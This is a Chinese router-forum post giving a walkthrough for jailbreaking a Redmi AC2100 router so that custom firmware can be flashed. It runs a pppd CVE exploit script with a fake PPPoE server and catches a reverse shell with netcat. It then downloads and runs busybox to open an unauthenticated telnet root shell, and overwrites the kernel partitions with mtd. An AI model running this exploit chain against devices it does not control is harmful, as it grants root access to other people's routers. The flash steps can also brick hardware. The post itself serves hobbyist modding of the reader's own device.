|
|
本帖最后由 Guaniu 于 2020-5-2 11:56 编辑
上传不了附件就不上传啊,你们可以去下
https://www.right.com.cn/forum/thread-4016985-1-1.html 的包!
手动是当自动没有反弹的时候使用!能反就不要用这个了,没图教程,灵魂学习~
感谢我群老哥lework 1003877216改的循环pppd-cve.py
pppd-cve.rar
(1.38 KB, 下载次数: 445)
手动时使用pppd-cve.py替换redmi文件来下pppd-cve.py
解压出来的rm2100文件夹要放到桌面,你不放到桌面你就在在CMD里用命令进入到rm2100目录里,才能运行下面的命令!
打开4个CMD
然后4个全输入cd C:\Users\Administrator\Desktop\rm2100 来到刷机rm2100文件夹里面!
然后第一个窗口输入python.exe redmi\PPPoE_Simulator.py
第二个输入python.exe -m http.server 8081
第三个输入入nc.exe -nvlp 31337
然后就进路由器,拔号断开,然后再点拔好,直到那里显示连接成功!
第四个就输入python.exe redmi\pppd-cve.py
等待第三个监视里出现IP信息!
然后在第三个CMD命令窗口里输入
cd /tmp&&wget http://192.168.31.177:8081/busybox&&chmod a+x ./busybox&&./busybox telnetd -l /bin/sh
等等命令完成,弹出shell窗口!
shell窗口输入命令
wget http://192.168.31.177:8081/r3g.bin&&nvram set uart_en=1&&nvram set bootdelay=5&&nvram set flag_try_sys1_failed=1&&nvram commit
mtd -r write r3g.bin kernel1
等待完成!
先更改本地连接IP地址为192.168.1.X网段,255.255.255.0 网关192.168.1.1
然后用WINscp 连接192.168.1.1,协议是SCP,账号:root 密码:admin
然后上最上面的三点,切到主目录后,选择tmp文件夹,放进固件redmi.trx
完成后再打开putty打开192.168.1.1,账号:root 密码:admin
然后出出现的OP窗口里执行
mtd -r write /tmp/redmi.trx kernel
等待完成!
本地连接设为自动获取IP!
就可以通过192.168.2.1 账号:root 密码:admin 进入路由设置页面!
|
评分
-
| 参与人数 2 | 恩山币 +2 |
收起
理由
|
 情天捡叶
| + 1 |
感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧! |
 啦啦啦爱你哟
| + 1 |
生活不易,相遇也不易,既然这样,让我们成为朋友一起面朝大海、花开花落…… |
查看全部评分
|
[复制链接]
|手机版|小黑屋|Archiver|恩山无线论坛(常州市恩山计算机开发有限公司版权所有)
( 苏ICP备05084872号 )|网站地图
发表于 2020-5-1 16:13
楼主
懒得装虚拟机!
